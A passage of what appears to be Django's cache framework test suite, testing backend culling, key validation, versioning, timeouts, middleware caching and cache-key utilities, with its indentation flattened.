# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertEqual(cache.get('answer1', version=2), None)
self.assertEqual(caches['v2'].get('answer1'), None)
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertEqual(caches['v2'].get('answer1', version=2), None)
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertEqual(cache.get('answer3'), None)
self.assertEqual(cache.get('answer3', version=1), None)
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertEqual(caches['v2'].get('answer3', version=1), None)
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertEqual(cache.get('answer4', version=2), None)
self.assertEqual(caches['v2'].get('answer4'), None)
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertEqual(caches['v2'].get('answer4', version=2), None)
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), None)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), None)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), None)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.get('answer', version=3), None)
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), None)
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2', version=3), None)
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertEqual(cache.get('answer', version=2), None)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(caches['custom_key'].get('answer1'), None)
self.assertEqual(caches['custom_key2'].get('answer1'), None)
caches['custom_key'].set('answer2', 42)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
stdout = six.StringIO()
management.call_command(
'createcachetable',
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
stdout = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertEqual(cache.get("key1"), None)
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
def test_createcachetable_observes_database_router(self):
old_routers = router.routers
try:
router.routers = [DBCacheRouter()]
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create the table
# 3: create the index
with self.assertNumQueries(3, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
finally:
router.routers = old_routers
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertEqual(caches['other'].get('value'), None)
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache in settings.CACHES.items():
if cache['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
def tearDown(self):
shutil.rmtree(self.dirname)
super(FileBasedCacheTests, self).tearDown()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class GetCacheTests(IgnorePendingDeprecationWarningsMixin, TestCase):
def test_simple(self):
from django.core.cache import caches, get_cache
self.assertIsInstance(
caches[DEFAULT_CACHE_ALIAS],
get_cache('default').__class__
)
cache = get_cache(
'django.core.cache.backends.dummy.DummyCache',
**{'TIMEOUT': 120}
)
self.assertEqual(cache.default_timeout, 120)
self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')
def test_close(self):
from django.core import signals
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_deprecated(self):
from django.core.cache import get_cache
from django.core import signals
cache = get_cache('cache.closeable_cache.CacheClass')
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEquals(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEquals(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIs(None, cache.default_timeout)
self.assertEquals(None, cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertNotEquals(None, cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def text_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertEquals(None, cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualfied URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertTrue(get_cache_key(request1) != get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, set(['private'])),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, set(['private'])),
('private', {'public': True}, set(['public'])),
('public', {'public': True}, set(['public'])),
('public', {'private': True}, set(['private'])),
('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])),
('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
